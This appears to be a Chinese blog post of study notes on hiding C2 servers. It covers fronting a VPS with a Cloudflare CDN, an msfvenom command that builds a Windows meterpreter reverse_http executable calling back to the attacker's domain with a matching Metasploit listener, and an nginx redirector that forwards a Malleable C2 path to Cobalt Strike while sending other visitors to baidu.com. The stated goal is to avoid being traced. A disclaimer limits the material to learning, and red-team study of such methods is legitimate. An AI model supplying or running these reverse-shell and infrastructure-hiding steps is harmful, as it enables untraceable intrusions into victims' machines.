C2 实验 学习笔记

C2 实验


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


C2隐藏技术

CDN

准备

  • 一台 vultr centos7 机器
  • 一个域名
  • cloudflare 账号

挂上 cdn

在域名购买后配置,cf 中的域名解析,在 cf 中配置 A 记录, 记录 IP 为 vps 地址

名称随意,如下

ping 测试

104.21.49.218 是 cf 的IP

端口限制

Cloudflare 支持的 HTTP 端口是:

  • 80
  • 8080
  • 8880
  • 2052
  • 2082
  • 2086
  • 2095

Cloudflare 支持的 HTTPS 端口是:

  • 443
  • 2053
  • 2083
  • 2087
  • 2096
  • 8443

CS

监听器配置域名

生成payload,在靶机上执行

显示的目标是 172.67.195.13 ,这个IP也是 cloudflare 的 ip

cs上也显示了目标

但是这种情况还是会暴露域名的,如果域名备案或者有其他特征,依然会被溯源。

MSF

payload 使用 reverse_http

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=<域名> LPORT=80 -f exe > shell.exe

起监听

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_http
set lhost <域名>
set LPORT 80
exploit -j


重定向

nginx 反代 CS

准备

  • 一台 vultr centos7 机器

使用 Malleable C2 文件

访问 https://github.com/threatexpress/malleable-c2 ,下载 jquery-c2.4.0.profile

上传至 CS 目录,检查可用性

chmod +x c2lint
./c2lint jquery-c2.4.0.profile

无误后,运行 cs

cs 配置监听

搭建 nginx

wget https://nginx.org/download/nginx-1.16.1.tar.gz
tar -zxvf nginx-1.16.1.tar.gz
cd nginx-1.16.1/
./configure
make
make install
cd /usr/local/nginx/sbin
./nginx

注:源代码安装你的默认目录在 /usr/local/nginx 下,配置文件在 conf/ 中,不要搞错了

访问 IP,可以看到一个欢迎页

修改 nginx.conf

cd /usr/local/nginx/conf
vim nginx.conf

+ location ~*/jquery {
+     proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+     proxy_pass  http://127.0.0.1:8080;
+ }

+ location / {
+     proxy_pass  http://www.baidu.com/;
+ }

重启 nginx

cd /usr/local/nginx/sbin && ./nginx -s reload

这个时候访问 nginx 服务默认会转到 baidu, 加路径 /jquery-3.3.1.min.js

生成 payload 测试一下


Source & Reference

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

posted @ 2022-10-31 10:32  syscallwww  阅读(83)  评论(0编辑  收藏  举报